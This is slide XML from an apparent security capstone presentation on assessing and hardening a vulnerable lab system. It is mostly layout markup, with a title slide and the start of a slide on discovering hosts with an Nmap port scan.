          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="439" name="Google Shape;439;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40" name="Google Shape;440;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3" name="Google Shape;443;p25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="1345853"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="444" name="Google Shape;444;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5" name="Google Shape;445;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8" name="Shape 448"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="449" name="Google Shape;449;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50" name="Google Shape;450;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1" name="Google Shape;451;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3" name="Google Shape;453;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7" name="Google Shape;457;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9" name="Google Shape;459;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1" name="Shape 461"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="462" name="Google Shape;46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4" name="Google Shape;46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5" name="Google Shape;46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6" name="Google Shape;46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7" name="Google Shape;46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8" name="Google Shape;468;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9" name="Google Shape;469;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4" name="Google Shape;474;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5" name="Google Shape;475;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0" name="Google Shape;480;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1" name="Google Shape;481;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5" name="Google Shape;485;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8" name="Shape 488"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="489" name="Google Shape;489;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2" name="Google Shape;492;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3" name="Google Shape;493;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4" name="Google Shape;494;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5" name="Google Shape;495;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1" name="Google Shape;501;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3" name="Google Shape;503;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4" name="Google Shape;504;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5" name="Google Shape;505;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6" name="Google Shape;506;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7" name="Shape 507"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="508" name="Google Shape;508;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1" name="Google Shape;5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2" name="Google Shape;512;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3" name="Google Shape;51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4" name="Google Shape;514;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2" name="Google Shape;522;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3" name="Google Shape;523;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4" name="Google Shape;524;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5" name="Google Shape;525;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6" name="Shape 526"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="527" name="Google Shape;527;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 name="Google Shape;529;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0" name="Google Shape;530;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1" name="Google Shape;531;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2" name="Google Shape;532;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3" name="Google Shape;533;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0" name="Google Shape;540;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1" name="Google Shape;541;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2" name="Google Shape;542;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3" name="Google Shape;543;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4" name="Google Shape;544;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1" name="Google Shape;31;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3" name="Google Shape;33;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4" name="Google Shape;34;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 name="Google Shape;35;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 name="Google Shape;36;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7" name="Google Shape;37;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8" name="Google Shape;38;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39" name="Google Shape;3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5" name="Shape 545"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="546" name="Google Shape;546;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9" name="Google Shape;549;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0" name="Google Shape;550;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1" name="Google Shape;551;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2" name="Google Shape;552;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 name="Google Shape;558;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9" name="Google Shape;559;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0" name="Google Shape;560;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1" name="Google Shape;561;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2" name="Google Shape;562;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3" name="Google Shape;563;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4" name="Shape 564"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="565" name="Google Shape;565;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8" name="Google Shape;56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9" name="Google Shape;569;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0" name="Google Shape;570;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1" name="Google Shape;571;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2" name="Google Shape;582;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3" name="Google Shape;583;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4" name="Google Shape;584;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5" name="Google Shape;585;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6" name="Shape 586"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="587" name="Google Shape;587;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5" name="Google Shape;605;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7" name="Google Shape;607;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8" name="Shape 608"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="609" name="Google Shape;609;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6" name="Google Shape;626;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7" name="Google Shape;627;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8" name="Google Shape;628;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9" name="Google Shape;629;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0" name="Shape 630"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="631" name="Google Shape;631;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8" name="Google Shape;648;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9" name="Google Shape;649;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0" name="Google Shape;650;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1" name="Google Shape;651;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2" name="Shape 652"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="653" name="Google Shape;653;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1" name="Google Shape;671;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2" name="Google Shape;672;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3" name="Google Shape;673;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4" name="Google Shape;674;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5" name="Google Shape;675;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6" name="Google Shape;676;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7" name="Shape 677"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="678" name="Google Shape;678;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1" name="Google Shape;681;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2" name="Google Shape;682;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3" name="Google Shape;683;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4" name="Google Shape;684;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3" name="Google Shape;693;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6" name="Google Shape;696;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8" name="Google Shape;698;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9" name="Google Shape;699;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2" name="Shape 702"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="703" name="Google Shape;703;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6" name="Google Shape;706;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7" name="Google Shape;707;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8" name="Google Shape;708;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9" name="Google Shape;709;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1" name="Google Shape;721;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2" name="Google Shape;722;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3" name="Google Shape;723;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4" name="Google Shape;724;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5" name="Google Shape;725;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6" name="Google Shape;726;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7" name="Shape 727"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="728" name="Google Shape;728;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0" name="Google Shape;730;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1" name="Google Shape;731;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2" name="Google Shape;732;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3" name="Google Shape;733;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4" name="Google Shape;734;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6" name="Google Shape;746;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7" name="Google Shape;747;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8" name="Google Shape;748;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9" name="Google Shape;749;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0" name="Google Shape;750;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1" name="Google Shape;751;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2" name="Shape 752"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="753" name="Google Shape;753;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5" name="Google Shape;755;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6" name="Google Shape;756;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7" name="Google Shape;757;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8" name="Google Shape;75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9" name="Google Shape;75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0" name="Google Shape;760;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3" name="Google Shape;773;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4" name="Google Shape;774;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6" name="Google Shape;776;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7" name="Google Shape;777;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8" name="Google Shape;778;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9" name="Google Shape;779;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2" name="Google Shape;42;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 name="Google Shape;43;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4" name="Google Shape;44;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5" name="Google Shape;45;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6" name="Google Shape;46;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 name="Google Shape;47;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 name="Google Shape;48;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9" name="Google Shape;49;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0" name="Google Shape;5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0" name="Shape 780"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="781" name="Google Shape;781;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4" name="Google Shape;78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5" name="Google Shape;785;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6" name="Google Shape;78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7" name="Google Shape;78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8" name="Google Shape;788;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1" name="Google Shape;801;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4" name="Google Shape;804;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8" name="Shape 808"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="809" name="Google Shape;809;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2" name="Google Shape;812;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3" name="Google Shape;813;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4" name="Google Shape;8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5" name="Google Shape;81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9" name="Google Shape;829;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0" name="Google Shape;830;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1" name="Google Shape;831;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2" name="Google Shape;832;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3" name="Google Shape;833;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4" name="Google Shape;834;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5" name="Google Shape;835;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6" name="Shape 836"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="837" name="Google Shape;837;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0" name="Google Shape;84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1" name="Google Shape;84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2" name="Google Shape;84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3" name="Google Shape;84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7" name="Google Shape;857;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8" name="Google Shape;858;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9" name="Google Shape;859;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0" name="Google Shape;860;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1" name="Google Shape;861;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2" name="Google Shape;862;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3" name="Google Shape;863;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4" name="Shape 864"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="865" name="Google Shape;865;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7" name="Google Shape;867;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8" name="Google Shape;868;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9" name="Google Shape;869;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0" name="Google Shape;870;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7" name="Google Shape;887;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8" name="Google Shape;888;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0" name="Google Shape;890;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1" name="Google Shape;891;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2" name="Google Shape;892;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3" name="Google Shape;893;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4" name="Google Shape;894;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5" name="Shape 895"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="896" name="Google Shape;896;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8" name="Google Shape;898;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9" name="Google Shape;899;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0" name="Google Shape;900;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1" name="Google Shape;901;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8" name="Google Shape;918;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6" name="Shape 926"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="927" name="Google Shape;92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9" name="Google Shape;92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0" name="Google Shape;93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1" name="Google Shape;93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2" name="Google Shape;93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7" name="Google Shape;94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9" name="Google Shape;949;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0" name="Google Shape;950;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1" name="Google Shape;951;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2" name="Google Shape;952;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3" name="Google Shape;953;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4" name="Google Shape;954;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5" name="Google Shape;955;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6" name="Google Shape;956;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7" name="Shape 957"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="958" name="Google Shape;95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0" name="Google Shape;96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1" name="Google Shape;96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2" name="Google Shape;96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3" name="Google Shape;96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0" name="Google Shape;980;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1" name="Google Shape;981;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2" name="Google Shape;982;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3" name="Google Shape;983;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4" name="Google Shape;984;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5" name="Google Shape;985;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6" name="Google Shape;986;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7" name="Google Shape;987;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8" name="Shape 988"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="989" name="Google Shape;989;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0" name="Google Shape;990;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1" name="Google Shape;991;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2" name="Google Shape;992;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3" name="Google Shape;993;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4" name="Google Shape;994;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5" name="Google Shape;995;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6" name="Shape 996"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="997" name="Google Shape;997;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1" name="Google Shape;1001;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2" name="Shape 1002"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003" name="Google Shape;100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4" name="Google Shape;1004;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 name="Google Shape;53;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4" name="Google Shape;5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5" name="Shape 1005"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1006" name="Google Shape;1006;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8" name="Google Shape;1008;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10" name="Shape 1010"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1011" name="Google Shape;1011;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2" name="Google Shape;1012;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13" name="Google Shape;1013;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4" name="Google Shape;1014;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6" name="Shape 1016"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1017" name="Google Shape;101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8" name="Google Shape;1018;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 name="Google Shape;59;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 name="Google Shape;60;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62" name="Shape 62"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Google Shape;63;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 name="Google Shape;65;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 name="Google Shape;66;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 name="Google Shape;67;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 name="Google Shape;68;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70"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72" name="Google Shape;72;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4" name="Google Shape;74;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 name="Google Shape;76;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8" name="Google Shape;78;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 name="Google Shape;79;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 name="Google Shape;83;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4" name="Google Shape;84;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6.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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3.jpg"/><Relationship Id="rId4"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3.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image103.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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8.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9.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2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image127.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image124.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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29.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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23.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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25.png"/><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s://www.elastic.co/guide/en/kibana/7.x/alerting-getting-started.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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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22" name="Shape 1022"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1023" name="Google Shape;1023;p54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274350" y="8562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34F5C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Capstone Engagement</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="134F5C"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Assessment, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Analysis, &amp; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Hardening of a </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Vulnerable System</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1024" name="Google Shape;1024;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025" name="Google Shape;1025;p54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3300600" y="3907350"/>
            <a:ext cx="254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Presented by Janice Wright</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>July 8,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125" name="Shape 1125"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1126" name="Google Shape;112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Exploitation #1: Exposure via a Port Scan</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1127" name="Google Shape;112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128" name="Google Shape;1128;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="457275" y="888650"/>
            <a:ext cx="2695500" cy="3746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txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990550" y="765875"/>
            <a:ext cx="2162100" cy="1440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500">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Nmap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>was run on the subnet of the attacking machine, since in this case all machines were within the same Hyper-V. </a:t>
            </a:r>
            <a:r>
              <a:rPr baseline="30000" lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>1 </a:t>
            </a:r>
            <a:endParaRPr baseline="30000" sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1130" name="Google Shape;1130;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="945528"/>
            <a:ext cx="533372" cy="476605"/>
            <a:chOff x="457200" y="1452955"/>
            <a:chExt cx="695400" cy="621307"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1131" name="Google Shape;1131;p63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1452955"/>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2" name="Google Shape;113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63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457169" y="2396678"/>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4" name="Google Shape;1134;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3419850" y="888675"/>
            <a:ext cx="5286000" cy="3746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txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913200" y="2176425"/>
            <a:ext cx="2162100" cy="2557200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>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lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Nmap indicated:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1500">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>IP address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Roboto"/>
